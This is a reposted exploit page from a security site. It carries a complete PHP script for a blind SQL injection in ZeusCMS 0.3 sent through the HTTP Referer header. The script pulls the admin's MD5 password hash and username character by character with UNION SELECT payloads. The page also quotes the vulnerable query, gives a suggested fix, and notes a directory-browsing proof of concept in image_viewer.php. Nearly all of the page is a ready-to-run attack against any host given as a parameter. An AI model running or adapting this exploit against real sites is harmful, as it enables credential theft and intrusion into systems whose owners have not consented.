首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 ZeusCMS <= 0.3 Remote Blind SQL Injection Exploit 来源：http://www.zeuscms.gr 作者：EgiX 发布时间：2007-12-28   <? /* ------------------------------------------------- ZeusCMS <= 0.3 Remote Blind SQL Injection Exploit ------------------------------------------------- author...: EgiX mail.....: n0b0d13s[at]gmail[dot]com link.....: http://www.zeuscms.gr/ details..: works with magic_quotes_gpc = off (if magic quotes affects also $_SERVER array) [-] Blind SQL Injection in /index.php : 129. $blockedRefCheck=security::checkRef($_SERVER["HTTP_REFERER"]); <== 130. 131. if(@in_array($_SERVER['REMOTE_ADDR'],$blockedips) || $blockedRefCheck==TRUE){ 132. include "html_files/denied.html"; 133. } 134. else [-] checkRef() function defined in /security.php : 130. function checkref($ref){ 131.   if($ref){ 132. $res=eregi_replace("http://","",$ref); 133. include "dbase.php"; 134. $table=$prefix."referers"; 135. $res=$db->query("SELECT * FROM $table WHERE url like '%$ref%' AND status='BLOCKED'"); <== 136. if($res->numRows()>0){ 137. return true; 138. } 139. else{ 140. return false; 141. } 142. }else{ 143.      return false; 144.    } an attacker can inject sql code through http referer header, that isn't properly checked... [*] Possible bug fix in /index.php : 128. $ref = security::safeGet($_SERVER["HTTP_REFERER"]); 129. $blockedRefCheck = security::checkRef($ref); [-] there is also a possible file system browsing through /image_viewer.php, p.o.c. : http://[host]/[path]/image_viewer.php?dir=/ */ error_reporting(0); ini_set("default_socket_timeout", 5); set_time_limit(0); function http_send($host, $packet) { $sock = fsockopen($host, 80); while (!$sock) { print "\n[-] No response from {$host}:80 Trying again..."; $sock = fsockopen($host, 80); sleep(1); } fputs($sock, $packet); $resp = ""; while (!feof($sock)) $resp .= fread($sock, 1); fclose($sock); return $resp; } function check_query($sql) { global $host, $path; $packet = "GET {$path} HTTP/1.1\r\n"; $packet.= "Host: {$host}\r\n"; $packet.= "Referer: {$sql} \r\n"; $packet.= "Keep-Alive: 300\r\n"; $packet.= "Connection: keep-alive\r\n\r\n"; $html = http_send($host, $packet); return (preg_match("/DENIED/", $html) ? true : false); } print "\n+-----------------------------------------------------------+"; print "\n| ZeusCMS <= 0.3 Remote Blind SQL Injection Exploit by EgiX |"; print "\n+-----------------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] host path [prefix] [userid]\n"; print "\nhost.......: target server (ip/hostname)"; print "\npath.......: path to ZeusCMS directory (example: / or /zeuscms/)"; print "\nprefix.....: table's prefix (default: ze)"; print "\nuserid.....: user id (default: 1 - admin)\n"; die(); } $host = $argv[1]; $path = $argv[2]; $pre  = (isset($argv[3]) ? $argv[3] : "ze"); $uid  = (isset($argv[4]) ? $argv[4] : "1"); $hash = array(0,48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); $index = 1; $md5 = ""; print "\n[-] MD5 Hash: "; while (!strpos($md5, chr(0))) { for ($i = 0; $i <= count($hash); $i++) {   if ($i == count($hash)) die("\n[-] Exploit failed...\n"); $sql = "%'/**/AND/**/id=-1/**/UNION/**/SELECT/**/pwd,1,1,1/**/FROM/**/{$pre}_users/**/" . "WHERE/**/id={$uid}/**/AND/**/ORD(SUBSTR(pwd,{$index},1))={$hash[$i]}/*"; if (check_query($sql)) { $md5 .= chr($hash[$i]); print chr($hash[$i]); break; } } $index++; } $char = array(0); // null char for ($j = 97; $j <= 122; $j++) $char = array_merge($char, array($j)); // a-z for ($j = 65; $j <= 90; $j++) $char = array_merge($char, array($j)); // A-Z for ($j = 48; $j <= 57; $j++) $char = array_merge($char, array($j)); // 0-9 $index = 1; $user = ""; print "\n[-] Username: "; while (!strpos($user, chr(0))) { for ($i = 0; $i <= count($char); $i++) {   if ($i == count($char)) die("\n[-] Exploit failed...\n"); $sql = "%'/**/AND/**/id=-1/**/UNION/**/SELECT/**/nickname,1,1,1/**/FROM/**/{$pre}_users/**/" . "WHERE/**/id={$uid}/**/AND/**/ORD(SUBSTR(nickname,{$index},1))={$char[$i]}/*"; if (check_query($sql)) { $user .= chr($char[$i]); print chr($char[$i]); break; } } $index++; } print "\n\n[-] Successfull!\n"; ?>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·March Networks DVR 3204 Logfil ·SkyFex Client 1.0 ActiveX Star ·XZero Community Classifieds <= ·Persits Software XUpload Contr ·RunCMS 1.6 Remote Blind SQL In ·Macrovision Installshield isus ·RunCMS 1.6 Get Admin Cookie Re ·IBM Domino Web Access Upload M ·AuraCMS 2.2 (admin_users.php) ·Zenphoto 1.1.3 (rss.php albumn ·BadBlue 2.72 PassThru Remote B ·oneSCHOOL (all versions) admin   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved